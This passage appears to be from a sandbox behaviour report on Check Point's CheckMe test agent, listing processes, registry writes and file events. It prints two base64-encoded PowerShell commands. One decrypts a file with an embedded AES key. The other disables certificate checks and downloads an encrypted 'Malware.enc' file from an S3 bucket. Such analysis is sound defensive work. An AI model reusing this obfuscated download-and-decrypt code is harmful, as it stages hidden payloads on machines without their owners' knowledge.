4AYwByAHkAcAB0AC4AVwByAGkAdABlACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHkAdABlAHMAUgBlAGEAZAApADsACgAJAAkACQAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQASQBuAHAAdQB0AFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApADsACgAJAAkAfQAKAAkAfQAKAAkAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAEUAeABjAGUAcAB0AGkAbwBuAF0ACgAJAHsACgAJAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABQAHIAbwBjAGUAcwBzAEYAaQBsAGUAKAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUALAAgACQAUAByAG8AYwBlAHMAcwBvAHIAKQAKAHsACgAJACQAaQBuAHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AIAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAiAE8AcABlAG4AIgAsACAAIgBSAGUAYQBkACIACgAJAGkAZgAgACgAIQAkAGkAbgBwAHUAdAAgAC0AbwByACAAKAAkAGkAbgBwAHUAdAAgAC0AaQBzAG4AbwB0ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAUwB0AHIAZQBhAG0AXQApACkACgAJAHsACgAJAAkAdABoAHIAbwB3ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUATgBvAHQARgBvAHUAbgBkAEUAeABjAGUAcAB0AGkAbwBuAF0AIAAiACQASQBuAHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGYAbwB1AG4AZAAuACIAIAAKAAkAfQAKAAoACQBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQBdACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQAgACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAIgBPAHAAZQBuAE8AcgBDAHIAZQBhAHQAZQAiACwAIAAiAFIAZQBhAGQAVwByAGkAdABlACIACgAJAGkAZgAgACgAIQAkAG8AdQB0AHAAdQB0ACAALQBvAHIAIAAoACQAbwB1AHQAcAB1AHQAIAAtAGkAcwBuAG8AdAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAFMAdAByAGUAYQBtAF0AKQApAAoACQB7AAoACQAJAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE4AbwB0AEYAbwB1AG4AZABFAHgAYwBlAHAAdABpAG8AbgBdACAAIgAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGMAcgBlAGEAdABlAGQALgAiACAACgAJAH0ACgAKACAAIAAgACAAUAByAG8AYwBlAHMAcwBTAHQAcgBlAGEAbQAgACQAaQBuAHAAdQB0ACAAJABvAHUAdABwAHUAdAAgACQAUAByAG8AYwBlAHMAcwBvAHIACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABEAGUAYwByAHkAcAB0AEYAaQBsAGUAKAAkAEkAbgBwAHUAdABGAGkAbABlACwAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUALAAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AJABBAGUAcwApAAoAewAKAAkAJABkAGUAYwByAHkAcAB0AG8AcgAgAD0AIAAkAEEAZQBzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApAAoAIAAgACAAIABQAHIAbwBjAGUAcwBzAEYAaQBsAGUAIAAkAEkAbgBwAHUAdABGAGkAbABlACAAJABPAHUAdABwAHUAdABGAGkAbABlACAAJABkAGUAYwByAHkAcAB0AG8AcgAgACQAZAAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEMAcgBlAGEAdABlAEEAZQBzACgAJABCAGEAcwBlADYANABLAGUAeQBEAGEAdABhACkACgB7AAoACQBbAGIAeQB0AGUAWwBdAF0AJABrAGUAeQBEAGEAdABhACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEIAYQBzAGUANgA0AEsAZQB5AEQAYQB0AGEAKQAKAAkAJABtAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoACwAJABrAGUAeQBEAGEAdABhACkACgAJACQAcgBlAGEAZABlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQgBpAG4AYQByAHkAUgBlAGEAZABlAHIAIAAkAG0AcwAKACAAIAAgACAACgAJACQAYQBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQQBlAHMAXQA6ADoAQwByAGUAYQB0AGUAKAApAAoACQAKACAAIAAgACAAJABzAGkAegBlACAAPQAgACQAcgBlAGEAZABlAHIALgBSAGUAYQBkAEkAbgB0ADMAMgAoACkAOwAKACAAIAAgACAAJABhAGUAcwAuAEkAVgAgAD0AIAAkAHIAZQBhAGQAZQByAC4AUgBlAGEAZABCAHkAdABlAHMAKAAkAHMAaQB6AGUAKQA7AAoAIAAgACAAIAAkAHMAaQB6AGUAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQASQBuAHQAMwAyACgAKQA7AAoAIAAgACAAIAAkAGEAZQBzAC4ASwBlAHkAIAA9ACAAJAByAGUAYQBkAGUAcgAuAFIAZQBhAGQAQgB5AHQAZQBzACgAJABzAGkAegBlACkAOwAKAAkACgAJAHIAZQB0AHUAcgBuACAAJABhAGUAcwAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEQAZQBjAHIAeQBwAHQAVwBpAHQAaABLAGUAeQBkAGEAdABhACgAWwBzAHQAcgBpAG4AZwBdACQARgBpAGwAZQBUAG8ARABlAGMAcgB5AHAAdAAsACAAWwBzAHQAcgBpAG4AZwBdACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAWwBzAHQAcgBpAG4AZwBdACQAQgBhAHMAZQA2ADQASwBlAHkARABhAHQAYQApAAoAewAKAAkAJABhAGUAcwAgAD0AIABDAHIAZQBhAHQAZQBBAGUAcwAgACQAQgBhAHMAZQA2ADQASwBlAHkARABhAHQAYQAKAAkACQAJAAoACQBEAGUAYwByAHkAcAB0AEYAaQBsAGUAIAAkAEYAaQBsAGUAVABvAEQAZQBjAHIAeQBwAHQAIAAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIAAkAGEAZQBzAAoACQByAGUAdAB1AHIAbgAgADEACgB9AAoAJABpAG4AIAA9ACAAIgBjADoAXAB0AGUAbQBwAFwAQwBQAFwAVABlAG0AcABfAEMAUABfAEEARQAuAGUAeABlACIACgAkAG8AdQB0ACAAPQAgACIAYwA6AFwAdABlAG0AcABcAEMAUABcAEMAUABfAEEARQAuAGUAeABlACIACgAkAGsAZQB5AGQAYQB0AGEAIAA9ACAAIgBFAEEAQQBBAEEARgB1AHgAZwA4ADkAeABIAE0AQgA5AHYAUgBmAHoAWgBxAHYAKwByAFkAYwBnAEEAQQBBAEEAeQA0AGUATgBGADcAWQBLAC8AVwBFAE4AaABNAGwAMwBvAEkASgBZAHYAZwBGAGkAaQBXADMAcABBAFIAQgBuADEAZQAzAHQAWABPAEwAaABRAGgAMAA9ACIACgAKAHIAZQB0AHUAcgBuACAARABlAGMAcgB5AHAAdABXAGkAdABoAEsAZQB5AGQAYQB0AGEAIAAkAGkAbgAgACQAbwB1AHQAIAAkAGsAZQB5AGQAYQB0AGEA | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2956 | "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding | C:\Program Files\Internet Explorer\iexplore.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 4294967295 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3032 | "C:\Users\admin\AppData\Local\Temp\cpcheckme_Y0p3xqew.exe" | C:\Users\admin\AppData\Local\Temp\cpcheckme_Y0p3xqew.exe | explorer.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 3088 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2956 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | — | iexplore.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 4294967295 Version: 8.00.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3316 | PowerShell.exe -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAVwByAGkAdABlAEwAbwBnACgAWwBzAHQAcgBpAG4AZwBdACQAZABhAHQAYQApAAoAewAKACAAIAAgACAAJABEAGEAdABlAEYAbwByAG0AYQB0ACAAPQAgACIAZABkAE0ATQB5AHkALQBIAEgAbQBtAHMAcwAuAGYAZgBmACIACgAgACAAIAAgACQAbABvAGcARgBpAGwAZQAgAD0AIAAiAGMAOgBcAHQAZQBtAHAAXABDAFAAXABDAG0AUwBjAHIAaQBwAHQATABvAGcALgBsAG8AZwAiAAoAIAAgACAAIAB0AHIAeQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAHQAaQBtAGUAUwB0AHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAYQB0AGUAVABpAG0AZQBdADoAOgBOAG8AdwAuAFQAbwBTAHQAcgBpAG4AZwAoACQARABhAHQAZQBGAG8AcgBtAGEAdAApAAoAIAAgACAAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AEEAcABwAGUAbgBkAEEAbABsAFQAZQB4AHQAKAAkAGwAbwBnAEYAaQBsAGUALAAgACQAdABpAG0AZQBTAHQAcgAgACsAIAAiACAALQAgACIAIAArACAAJABkAGEAdABhACAAKwAgACIAYABuACIAKQAKACAAIAAgACAAfQAKACAAIAAgACAAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAEUAeABjAGUAcAB0AGkAbwBuAF0ACgAgACAAIAAgAHsACgAgACAAIAAgAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABSAGUAcwBwAG8AbgBzAGUAKABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAkAHIAZQBxAHUAZQBzAHQAKQAKAHsACgAgACAAIAAgAHQAcgB5AAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAkAHIAZQBxAHUAZQBzAHQALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAIAAgACAAIAAKACAAIAAgACAAfQAKACAAIAAgACAAYwBhAHQAYwBoACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIARQB4AGMAZQBwAHQAaQBvAG4AXQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIARQB4AGMAZQBwAHQAaQBvAG4AXQAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAZQAuAFMAdABhAHQAdQBzACAALQBlAHEAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBTAHQAYQB0AHUAcwBdADoAOgBQAHIAbwB0AG8AYwBvAGwARQByAHIAbwByACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAkAGUALgBSAGUAcwBwAG8AbgBzAGUAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQBMAG8AZwAgACIARwBlAHQAUgBlAHMAcABvAG4AcwBlACAAdQBuAGUAeABwAGUAdABlAGQAIABlAHgAYwBlAHAAdABpAG8AbgAiAAoAIAAgACAAIAAgACAAIAAgAHQAaAByAG8AdwA7AAoAIAAgACAAIAB9AAoAfQAKAAoAZgB1AG4AYwB0AGkAbwBuACAAQwBvAHAAeQBTAHQAcgBlAGEAbQAoACQASQBuAHAAdQB0AFMAdAByAGUAYQBtACwAIAAkAE8AdQB0AHAAdQB0AFMAdAByAGUAYQBtACkACgB7AAoAIAAgACAAIAAkAGIAdQBmAGYAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgADEAMAAyADQACgAgACAAIAAgAAoAIAAgACAAIAB0AHIAeQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAGIAeQB0AGUAcwBSAGUAYQBkACAAPQAgACQASQBuAHAAdQB0AFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApADsACgAgACAAIAAgACAAIAAgACAAdwBoAGkAbABlACAAKAAkAGIAeQB0AGUAcwBSAGUAYQBkACAALQBuAGUAIAAwACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQATwB1AHQAcAB1AHQAUwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAGIAdQBmAGYAZQByACwAIAAwACwAIAAkAGIAeQB0AGUAcwBSAGUAYQBkACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAIAA9ACAAJABJAG4AcAB1AHQAUwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAOwAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIAAgACAAIABjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ARQB4AGMAZQBwAHQAaQBvAG4AXQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIABXAHIAaQB0AGUATABvAGcAIAAiAEMAbwBwAHkAUwB0AHIAZQBhAG0AIAB1AG4AZQB4AHAAZQB0AGUAZAAgAGUAeABjAGUAcAB0AGkAbwBuACIACgAgACAAIAAgAH0ACgB9AAoACgBmAHUAbgBjAHQAaQBvAG4AIABSAGUAYQBkAFIAZQBzAHAAbwBuAHMAZQAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACQAUgBlAHEAdQBlAHMAdAAsACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAF0AJABPAHUAdABwAHUAdAApAAoAewAKACAAIAAgACAAdAByAHkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcwBwAG8AbgBzAGUAXQAkAGgAdAB0AHAAUgBlAHMAcABvAG4AcwBlACAAPQAgAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAgACQAcgBlAHEAdQBlAHMAdAAKACAAIAAgACAAIAAgACAAIAAkAGkAbgBwAHUAdAAgAD0AIAAkAGgAdAB0AHAAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQAKACAAIAAgACAAIAAgACAAIABDAG8AcAB5AFMAdAByAGUAYQBtACAAJABpAG4AcAB1AHQAIAAkAE8AdQB0AHAAdQB0AAoAIAAgACAAIAB9AAoAIAAgACAAIABjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBFAHgAYwBlAHAAdABpAG8AbgBdACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABlAC4AUwB0AGEAdAB1AHMACgAgACAAIAAgAH0ACgAgACAAIAAgAGMAYQB0AGMAaAAgAFsAUwB5AHMAdABlAG0ALgBFAHgAYwBlAHAAdABpAG8AbgBdAAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAFcAcgBpAHQAZQBMAG8AZwAgACIAUgBlAGEAZABSAGUAcwBwAG8AbgBzAGUAIAB1AG4AZQB4AHAAZQB0AGUAZAAgAGUAeABjAGUAcAB0AGkAbwBuACIACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAA2ADYANgAKACAAIAAgACAAfQAKACAACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAMAAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AFAAcgBvAHgAeQAoAFsAcwB0AHIAaQBuAGcAXQAgACQAVQByAGwAKQAKAHsACgAgACAAIAAgAHQAcgB5AAoAIAAgACAAIAB7AAoAIAAgACAAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBVAHIAaQBbAF0AXQAkAHUAcgBpAHMAIAA9ACAAQAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAFUAcgBpACgAJABVAHIAbAApACkACgAgACAAIAAgACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASQBXAGUAYgBQAHIAbwB4AHkAXQAgACQAaQBQAHIAbwB4AHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAkAGkAUAByAG8AeAB5ACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABuAHUAbABsAAoAIAAgACAAIAAgACAAIAAgAH0ACgAKACAAIAAgACAAIAAgACAAIABmAG8AcgBlAGEAYwBoACAAKAAkAHUAcgBpACAAaQBuACAAJAB1AHIAaQBzACkACgAgACAAIAAgACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcAByAG8AeAB5AFUAcgBpACAAPQAgACQAaQBQAHIAbwB4AHkALgBHAGUAdABQAHIAbwB4AHkAKAAkAHUAcgBpACkAOwAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABwAHIAbwB4AHkAVQByAGkAIAAtAG4AZQAgACQAdQByAGkAKQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABpAFAAcgBvAHgAeQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgACAAIAAgACAAfQAKAAoAIAAgACAAIAB9AAoAIAAgACAAIABjAGEAdABjAGgAIABbAFMAeQBzAHQAZQBtAC4ARQB4AGMAZQBwAHQAaQBvAG4AXQAKACAAIAAgACAAewAKACAAIAAgACAAfQAKAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAAKAH0ACgAKAGYAdQBuAGMAdABpAG8AbgAgAEQAbwBHAGUAdAAoAFsAcwB0AHIAaQBuAGcAXQAkAFUAcgBsACwAIABbAHMAdAByAGkAbgBnAF0AJABPAHUAdABwAHUAdABGAGkAbABlACkACgB7AAoAIAAgACAAIABXAHIAaQB0AGUATABvAGcAIAAiAEQAbwBHAGUAdAAgAHMAdABhAHIAdABlAGQAIgAKACAAIAAgACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4ASAB0AHQAcABXAGUAYgBSAGUAcQB1AGUAcwB0AF0AJAByAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAFUAcgBsACkACgAgACAAIAAgACQAcAByAG8AeAB5ACAAPQAgAEcAZQB0AFAAcgBvAHgAeQAgACQAVQByAGwACgAgACAAIAAgAGkAZgAgACgAJABwAHIAbwB4AHkAKQAKACAAIAAgACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQALgBQAHIAbwB4AHkAIAA9ACAAJABwAHIAbwB4AHkACgAgACAAIAAgAH0ACgAgACAAIAAgACQAcgBlAHEAdQBlAHMAdAAuAE0AZQB0AGgAbwBkACAAPQAgACIARwBFAFQAIgAKAAoAIAAgACAAIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQBdACQAbwB1AHQAcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBTAHQAcgBlAGEAbQAgACQATwB1AHQAcAB1AHQARgBpAGwAZQAsACAAIgBPAHAAZQBuAE8AcgBDAHIAZQBhAHQAZQAiACwAIAAiAFIAZQBhAGQAVwByAGkAdABlACIACgAgACAAIAAgAGkAZgAgACgAIQAkAG8AdQB0AHAAdQB0ACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAEwAbwBnACAAIgBFAHIAcgBvAHIAOgAgAG8AdQB0AHAAdQB0ACAAZgBpAGwAZQAgAG4AbwB0ACAAYwByAGUAYQB0AGUAZAAiAAoAIAAgACAAIAAgACAAIAAgAHQAaAByAG8AdwAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAE4AbwB0AEYAbwB1AG4AZABFAHgAYwBlAHAAdABpAG8AbgBdACAAIgAkAE8AdQB0AHAAdQB0AEYAaQBsAGUAIABuAG8AdAAgAGMAcgBlAGEAdABlAGQALgAiACAACgAgACAAIAAgAH0ACgAKACAAIAAgACAAVwByAGkAdABlAEwAbwBnACAAIgBSAGUAYQBkAGkAbgBnACAAcgBlAHMAcABvAG4AcwBlACIACgAgACAAIAAgACQAcwB0AGEAdAB1AHMAIAA9ACAAUgBlAGEAZABSAGUAcwBwAG8AbgBzAGUAIAAkAHIAZQBxAHUAZQBzAHQAIAAkAG8AdQB0AHAAdQB0AAoAIAAgACAAIAAkAG8AdQB0AHAAdQB0AC4ARgBsAHUAcwBoACgAKQAKACAAIAAgACAAJABvAHUAdABwAHUAdAAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgAFcAcgBpAHQAZQBMAG8AZwAgACIARABvAEcAZQB0ACAAZABvAG4AZQAiAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAcwB0AGEAdAB1AHMACgB9AAoACgAkAHUAcgBsACAAPQAgACIAaAB0AHQAcABzADoALwAvAHMAMwAuAHUAcwAtAGUAYQBzAHQALQAyAC4AYQBtAGEAegBvAG4AYQB3AHMALgBjAG8AbQAvAGMAcABjAGgAZQBjAGsAbQBlAGYAaQBsAGUAcwAvAGYAaQBsAGUAcwAvAE0AYQBsAHcAYQByAGUALgBlAG4AYwAiAAoAJABvAHUAdABGAGkAbABlACAAPQAgACIAYwA6AFwAdABlAG0AcABcAEMAUABcAFQAZQBtAHAAXwBDAFAAXwBBAE0ALgBlAHgAZQAiAAoACgBXAHIAaQB0AGUATABvAGcAIAAiAEQAbwB3AG4AbABvAGEAZAAgAHMAdABhAHIAdABlAGQAIgAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0ACgBbAGkAbgB0AF0AJAByAGUAcwAgAD0AIABEAG8ARwBlAHQAIAAkAHUAcgBsACAAJABvAHUAdABGAGkAbABlAAoAVwByAGkAdABlAEwAbwBnACAAIgBEAG8AdwBuAGwAbwBhAGQAIABlAG4AZAAiAAoAZQB4AGkAdAAgACQAcgBlAHMA | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe | wmiprvse.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 3420 | "C:\temp\CP_Agent\cpchmelsagent_Y0p3xqew.exe" | C:\temp\CP_Agent\cpchmelsagent_Y0p3xqew.exe | cpcheckme_Y0p3xqew.exe | ||||||||||||
User: admin Company: Check Point Integrity Level: MEDIUM Description: CheckMeAgent Exit code: 0 Version: 1.0.0.0 Modules
| |||||||||||||||
| (PID) Process: | (3420) cpchmelsagent_Y0p3xqew.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3420) cpchmelsagent_Y0p3xqew.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\cpchmelsagent_Y0p3xqew_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3420) cpchmelsagent_Y0p3xqew.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\cpchmelsagent_Y0p3xqew_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (3420) cpchmelsagent_Y0p3xqew.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\cpchmelsagent_Y0p3xqew_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
| (PID) Process: | (3420) cpchmelsagent_Y0p3xqew.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\cpchmelsagent_Y0p3xqew_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 | |||
| (PID) Process: | (3420) cpchmelsagent_Y0p3xqew.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\cpchmelsagent_Y0p3xqew_RASAPI32 |
| Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
| (PID) Process: | (3420) cpchmelsagent_Y0p3xqew.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\cpchmelsagent_Y0p3xqew_RASAPI32 |
| Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
| (PID) Process: | (3420) cpchmelsagent_Y0p3xqew.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\cpchmelsagent_Y0p3xqew_RASMANCS |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (3420) cpchmelsagent_Y0p3xqew.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\cpchmelsagent_Y0p3xqew_RASMANCS |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (3420) cpchmelsagent_Y0p3xqew.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\cpchmelsagent_Y0p3xqew_RASMANCS |
| Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3316 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ST6UD0KHQ1CQ7TJY3MKU.temp | — | |
MD5:— | SHA256:— | |||
| 4048 | PowerShell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Z355DEP6Y7V01S248ZQU.temp | — | |
